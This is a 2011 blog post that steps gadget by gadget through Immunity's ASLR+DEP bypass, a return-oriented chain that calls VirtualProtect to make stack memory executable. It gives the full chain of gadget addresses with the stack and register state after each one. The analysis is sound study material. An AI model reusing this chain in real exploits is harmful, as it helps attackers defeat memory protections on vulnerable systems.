Sayonara ASLR+DEP bypass dissection

05-Jul-2011 00:11

(Long time, no see…)
Recently there was quite a bit of noise about Immunity's ASLR+DEP bypass. Just out of curiosity I made a step-by-step (well, gadget-by-gadget) dissection. It's pretty neat.

Initial stack and register contents

0x010000 7c344cc1 7c3410c2 7c342462 7c38c510
0x010010 7c365645 7c345243 7c348f46 7c3487ec
0x010020 7c344cc1 fffffc14 7c34d749 7c3458aa
0x010030 7c3439fa ffffffc0 7c351eb1 7c354648
0x010040 7c3530ea 7c344cc1 7c37a181 7c355aeb
0x010050 7c378c81 7c36683f ........ ........
eax=........ ecx=........ edx=........ ebx=........
esp=00010000 ebp=........ esi=........ edi=........
eip=xxxxxxxx

The following fragments show each gadget together with the stack contents and register values AFTER that gadget has executed. (I've split gadget no 14 into two pieces, just to make it easier to read.)

gadget no 1

  • xxxxxxxxxx: ret
  • 0x7c344cc1: pop eax
  • 0x7c344cc2: ret
0x01000c 7c38c510 7c365645 7c345243 7c348f46
0x01001c 7c3487ec 7c344cc1 fffffc14 7c34d749
0x01002c 7c3458aa 7c3439fa ffffffc0 7c351eb1
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
eax=7c3410c2 ecx=........ edx=........ ebx=........
esp=0001000c ebp=........ esi=........ edi=........
eip=7c342462

gadget no 2

  • 7c342462 xor ebx,ebx
  • 7c342464 xor ecx,ecx
  • 7c342466 xor edx,edx
  • 7c342468 xor esi,esi
  • 7c34246a xor edi,edi
  • 7c34246c call eax {7c3410c2}
0x010008 7c34246e 7c38c510 7c365645 7c345243
0x010018 7c348f46 7c3487ec 7c344cc1 fffffc14
0x010028 7c34d749 7c3458aa 7c3439fa ffffffc0
0x010038 7c351eb1 7c354648 7c3530ea 7c344cc1
0x010048 7c37a181 7c355aeb 7c378c81 7c36683f
0x010058 ........ ........ ........ ........
eax=7c3410c2 ecx=00000000 edx=00000000 ebx=00000000
esp=00010008 ebp=........ esi=00000000 edi=00000000
eip=7c3410c2

gadget no 3

  • 7c3410c2 pop ecx
  • 7c3410c3 pop ecx
  • 7c3410c4 ret
0x010014 7c345243 7c348f46 7c3487ec 7c344cc1
0x010024 fffffc14 7c34d749 7c3458aa 7c3439fa
0x010034 ffffffc0 7c351eb1 7c354648 7c3530ea
0x010044 7c344cc1 7c37a181 7c355aeb 7c378c81
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
eax=7c3410c2 ecx=7c38c510 edx=00000000 ebx=00000000
esp=00010014 ebp=........ esi=00000000 edi=00000000
eip=7c365645

gadget no 4

  • 7c365645 5e pop esi
  • 7c365646 c3 ret
0x01001c 7c3487ec 7c344cc1 fffffc14 7c34d749
0x01002c 7c3458aa 7c3439fa ffffffc0 7c351eb1
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
eax=7c3410c2 ecx=7c38c510 edx=00000000 ebx=00000000
esp=0001001c ebp=........ esi=7c345243 edi=00000000
eip=7c348f46

gadget no 5

  • 7c348f46 pop ebp
  • 7c348f47 ret
0x010024 fffffc14 7c34d749 7c3458aa 7c3439fa
0x010034 ffffffc0 7c351eb1 7c354648 7c3530ea
0x010044 7c344cc1 7c37a181 7c355aeb 7c378c81
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
eax=7c3410c2 ecx=7c38c510 edx=00000000 ebx=00000000
esp=00010024 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c344cc1

gadget no 6

  • 7c344cc1 pop eax
  • 7c344cc2 ret
0x01002c 7c3458aa 7c3439fa ffffffc0 7c351eb1
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
0x01007c ........ ........ ........ ........
eax=fffffc14 ecx=7c38c510 edx=00000000 ebx=00000000
esp=0001002c ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c34d749

gadget no 7

  • 7c34d749 neg eax
  • 7c34d74b ret
0x010030 7c3439fa ffffffc0 7c351eb1 7c354648
0x010040 7c3530ea 7c344cc1 7c37a181 7c355aeb
0x010050 7c378c81 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
eax=000003ec ecx=7c38c510 edx=00000000 ebx=00000000
esp=00010030 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c3458aa

gadget no 8

  • 7c3458aa add ebx,eax
  • 7c3458ac mov eax,dword ptr [esp+8] ; { [010038] = 7c351eb1 }
  • 7c3458b0 ret
0x010034 ffffffc0 7c351eb1 7c354648 7c3530ea
0x010044 7c344cc1 7c37a181 7c355aeb 7c378c81
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
0x010084 ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=00000000 ebx=000003ec
esp=00010034 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c3439fa

gadget no 9

  • 7c3439fa pop edx
  • 7c3439fb ret
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
0x01007c ........ ........ ........ ........
0x01008c ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=ffffffc0 ebx=000003ec
esp=0001003c ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c351eb1

gadget no 10

  • 7c351eb1 neg edx
  • 7c351eb3 ret
0x010040 7c3530ea 7c344cc1 7c37a181 7c355aeb
0x010050 7c378c81 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
0x010090 ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010040 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c354648

gadget no 11

  • 7c354648 pop edi
  • 7c354649 ret
0x010048 7c37a181 7c355aeb 7c378c81 7c36683f
0x010058 ........ ........ ........ ........
0x010068 ........ ........ ........ ........
0x010078 ........ ........ ........ ........
0x010088 ........ ........ ........ ........
0x010098 ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010048 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c344cc1

gadget no 12

  • 7c344cc1 pop eax
  • 7c344cc2 ret
0x010050 7c378c81 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
0x010090 ........ ........ ........ ........
0x0100a0 ........ ........ ........ ........
eax=7c37a181 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010050 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c355aeb

gadget no 13

  • 7c355aeb sub eax,30h
  • 7c355aee ret
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
0x010084 ........ ........ ........ ........
0x010094 ........ ........ ........ ........
0x0100a4 ........ ........ ........ ........
eax=7c37a151 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010054 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c378c81

gadget no 14 a.

  • 7c378c81 pushad
  • 7c378c82 add al,0EFh
0x010034 7c3530ea 7c345243 7c3487ec 00010054
0x010044 000003ec 00000040 7c38c510 7c37a151
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
0x010084 ........ ........ ........ ........
eax=7c37a140 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010034 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c378c84

gadget no 14 b.

  • 7c378c84 ret
0x010038 7c345243 7c3487ec 00010054 000003ec
0x010048 00000040 7c38c510 7c37a151 7c36683f
0x010058 ........ ........ ........ ........
0x010068 ........ ........ ........ ........
0x010078 ........ ........ ........ ........
0x010088 ........ ........ ........ ........
eax=7c37a140 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010038 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c3530ea

gadget no 15

  • 7c3530ea mov eax,dword ptr [eax] ; { [7c37a140] = 74c2435f (VirtualProtect) }
  • 7c3530ec ret
0x01003c 7c3487ec 00010054 000003ec 00000040
0x01004c 7c38c510 7c37a151 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
0x01007c ........ ........ ........ ........
0x01008c ........ ........ ........ ........
eax=74c2435f ecx=7c38c510 edx=00000040 ebx=000003ec
esp=0001003c ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c345243

gadget no 16

  • 7c345243 ret
0x010040 00010054 000003ec 00000040 7c38c510
0x010050 7c37a151 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
0x010090 ........ ........ ........ ........
eax=74c2435f ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010040 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c3487ec

gadget no 17

  • 7c3487ec call eax {VirtualProtect (74c2435f)}
  • 7c3487ee test eax,eax
  • 7c3487f0 pop ecx
  • 7c3487f1 je 7c3487f7
  • 7c3487f3 xor eax,eax
  • 7c3487f5 inc eax
  • 7c3487f6 ret
  • 7c3487f7 xor eax,eax
  • 7c3487f9 ret
0x010058 ........ ........ ........ ........
0x010068 ........ ........ ........ ........
0x010078 ........ ........ ........ ........
0x010088 ........ ........ ........ ........
0x010098 ........ ........ ........ ........
eax=__result ecx=7c37a151 edx=zzzzzzzz ebx=000003ec
esp=00010058 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c36683f

gadget no 18 (pass control back to stack)

  • 7c36683f push esp
  • 7c366840 and al,8
  • 7c366842 ret